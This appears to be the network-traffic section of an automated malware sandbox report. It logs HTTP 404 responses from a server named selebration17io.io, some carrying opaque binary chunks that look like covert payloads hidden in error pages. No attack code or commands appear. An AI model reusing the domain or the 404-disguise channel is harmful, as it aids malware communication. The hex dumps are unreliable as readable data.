01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 61 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 fd e2 aa 20 e4 7d bc 49 48 2d 47 85 94 be 9b 46 86 20 a9 66 23 81 76 4f ff b3 fb c4 ff 4e 9d 86 ba 69 59 f0 d7 67 f9 f1 3d ca 14 88 78 4d ff 4b 98 02 17 cb 18 1e 93 9d 2e 10 0f 68 45 c7 75 f6 54 e3 30 13 92 8e e3 e0 21 2e 34 ee 64 2d b7 65 14 97 13 04 87 5b f6 ff bb 52 33 8b f8 58 a5 ef c1 7f 3c 8f 08 46 65 b5 83 2b 22 a0 ac 7e fd e6 3a 75 78 2b 04 70 fc 9e 84 8c f2 ce 6b 3d 59 4a 81 1f 37 6e 46 75 bd a6 b3 3a 4e 26 e1 71 e1 70 c3 1f ac 14 c2 06 70 40 64 b6 29 a2 ec 27 01 2f ce 45 e4 15 45 c0 73 cf f4 02 2e ac 93 55 3b 1c a8 38 5f 22 cd 5d ff d4 6d f3 91 c8 7f 51 66 fd db 83 6a fe 51 7a 53 59 92 8e d0 18 96 57 13 d4 6c c1 13 0a 34 4c 53 4d 40 05 50 04 4b 05 a4 38 c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 25 13 ad f3 1b 3a 2f b9 30 bd 08 46 b2 75 0e 31 79 92 90 f7 3f f5 ee c6 79 2a 45 87 d0 32 e3 13 63 71 ba d6 af 31 3c 27 f4 48 b7 9f 33 d9 cc 46 d9 78 0f ac af eb 99 55 3d bf ba 68 92 1e ff 9d 7a 7f 55 40 57 64 7b 39 63 e7 ac 04 28 84 42 40 77 0b dc 9b 84 f7 3d 66 f1 8a 64 b1 1f 30 12 d1 8c 70 07 4b 81 7b df 8e 82 01 f8 e4 1f 4e a1 90 4e a1 54 55 b5 8e b7 1b 6f c3 cb 29 32 28 e7 5b a2 1e b1 1e 5a 7c 11 ee c3 ee 4c a3 f4 1e 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 4d 0b 9f 08 84 d9 b0 c9 35 83 8a 99 e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 b0 f9 1c d9 22 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca ac bb 40 56 eb 96 ce ec e5 8b d9 a7 0d b8 ca d4 5f 09 59 43 9c 45 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 05 7d da c9 ed 9a ac 4e bf 83 09 e8 05 04 1e ac 18 88 6d b3 0e a3 81 19 13 b8 a3 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 05 e1 f0 33 a3 27 b8 99 66 b2 52 dc 7e 28 8b 18 57 41 1b 7d 42 a3 81 96 7f b8 34 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 e2 25 1f b8 4e 4a 43 2d b5 a6 b8 78 46 b2 8e 98 6d 38 45 32 d0 f9 f3 32 42 c2 22 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d 9b 10 54 1a 39 6e 39 36 79 d0 19 5f 57 da 69 f9 e4 09 31 01 6e 91 fd 58 b3 cc 8e 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 82 01 6d 3c d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 34 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1c 86 09 9f 47 c7 f8 01 b5 20 f0 3e 0b 5a 38 fd 29 00 65 98 59 66 1b 7d d7 e2 89 bd cc 6a c1 7e 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 34Uys/~(`:G >Z8)eYf}j~/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 2d 5b e3 1b 34 c4 f5 72 98 94 0e be 44 07 d2 7d ae b1 4f 5c b8 39 3f 74 3d 05 f0 ff 6c f7 d4 bd 0c de 3e cb 96 df b0 ca 36 50 ca b2 e7 f5 b6 70 ba e2 5f f1 cb a6 da a6 f7 31 22 53 65 7e 3c cd cc ea 2e 28 7e 36 aa db b9 27 2e d5 4e 95 fe 5e bf 6c 13 d9 a5 e2 bf c4 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 5b 53 90 dc 84 fd 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5f db c4 29 11 13 bf 2a 9a 90 24 08 4f c5 a5 b5 cb a1 61 6e de f5 69 f9 1b 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a a4 43 7e 88 2c c8 48 d2 a2 c3 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf e8 f7 1a 54 9b 4a d8 19 fe b1 4d 0b 65 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb ac ce 46 c1 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 24 79 39 ea e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 6d 7c a3 90 4e b1 54 55 a5 aa b5 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 30 18 06 f1 2c 1e ac 03 5b d7 1f e4 a6 55 12 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 1c 0d b9 e2 2b 29 b6 bb 01 64 17 28 d2 f4 44 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 57 90 26 48 c4 3a 96 31 cb e7 17 3f cc 98 7c 4d a4 70 d4 03 93 ae 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 dc a6 a7 5f 29 43 43 51 5c 03 62 18 1a 60 fa 40 a0 ae 88 c1 be a3 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e 6c 36 d5 1e cb 67 f5 e8 19 1f 88 b9 8c f5 28 ea 50 b9 c3 ea 9e 13 6c ba 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 79 42 68 0b 2d 03 81 96 7f dc 2e 27 9d 9f 41 40 56 64 de 9e 73 89 b4 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 be b1 8e 58 43 6a 2d 40 b3 e9 f3 32 72 de 39 16 12 17 76 eb 17 0e 8d e3 51 aa b0 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 51 8f 69 b9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 147Date: Thu, 08 Feb 2024 18:09:51 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 70 69 6e 67 2e 70 68 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:10:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
